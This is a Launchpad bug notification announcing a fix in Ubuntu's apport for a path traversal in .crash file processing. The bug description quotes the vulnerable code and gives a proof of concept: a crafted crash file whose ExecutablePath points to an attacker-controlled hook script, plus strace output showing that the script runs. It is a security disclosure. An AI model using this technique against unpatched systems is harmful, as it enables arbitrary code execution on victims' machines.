[Touch-packages] [Bug 1700573] Re: Code execution through path traversal in .crash files processing

[Launchpad Bug Tracker]

This bug was fixed in the package apport - 2.20.6-0ubuntu4

---------------
apport (2.20.6-0ubuntu4) artful; urgency=medium

  * apport/REThread.py: A bare except needs to be used so that we can catch
    the dialog being closed.
  * test/test_report.py: Be a little patient and give some time for the core
    file to show up.

 -- Brian Murray <br...@ubuntu.com>  Fri, 21 Jul 2017 10:42:33 -0700

** Changed in: apport (Ubuntu Artful)
       Status: In Progress => Fix Released

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to apport in Ubuntu.
https://bugs.launchpad.net/bugs/1700573

Title:
  Code execution through path traversal in .crash files processing

Status in Apport:
  Fix Released
Status in apport package in Ubuntu:
  Fix Released
Status in apport source package in Trusty:
  Fix Released
Status in apport source package in Xenial:
  Fix Released
Status in apport source package in Yakkety:
  Fix Released
Status in apport source package in Zesty:
  Fix Released
Status in apport source package in Artful:
  Fix Released

Bug description:
  The function add_hooks_info in apport/report.py is vulnerable to a
  directory traversal when processing the ExecutablePath key of a
  malicious .crash file:

          opt_path = None
          if self.get('ExecutablePath', '').startswith(_opt_dir):
              opt_path = self.get('ExecutablePath', '')
          elif package:
              # check package contents
              try:
                  for f in apport.packaging.get_files(package):
                      if f.startswith(_opt_dir) and os.path.isfile(f):
                          opt_path = f
                          break
              except ValueError:
                  # uninstalled package
                  pass

          if opt_path:
              while len(opt_path) >= len(_opt_dir):
                  hook_dirs.append(os.path.join(opt_path, 'share', 'apport', 
'package-hooks'))
                  opt_path = os.path.dirname(opt_path)

  
  This can be used to execute an arbitrary python script from an attacker 
controlled path when a crash file is opened:

  fwilhelm@box:~$ cat poc.crash 
  ProblemType: Bug
  ExecutablePath: /opt/../tmp/poc/share/apport/package-hooks
  Package: f

  fwilhelm@box:~$ cat /tmp/poc/share/apport/package-hooks/f.py 
  import os
  os.system("gnome-calculator")

  fwilhelm@bpx:~$ strace -eprocess -f /usr/share/apport/apport-gtk poc.crash 
2>&1 | grep gnome-calculator
  [pid 62617] execve("/bin/sh", ["sh", "-c", "gnome-calculator"], [/* 65 vars 
*/]) = 0
  [pid 62617] execve("/usr/bin/gnome-calculator", ["gnome-calculator"], [/* 64 
vars */]) = 0

  The sub directory requirement makes this a bit tricky to exploit
  remotely, but depending on the environment a malicious USB drive, a
  shared NFS share or a crash file inside an archive could be used.

  Please credit Felix Wilhelm from the Google Security Team in all
  releases, patches and advisories related to these issues.

To manage notifications about this bug go to:
https://bugs.launchpad.net/apport/+bug/1700573/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to     : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp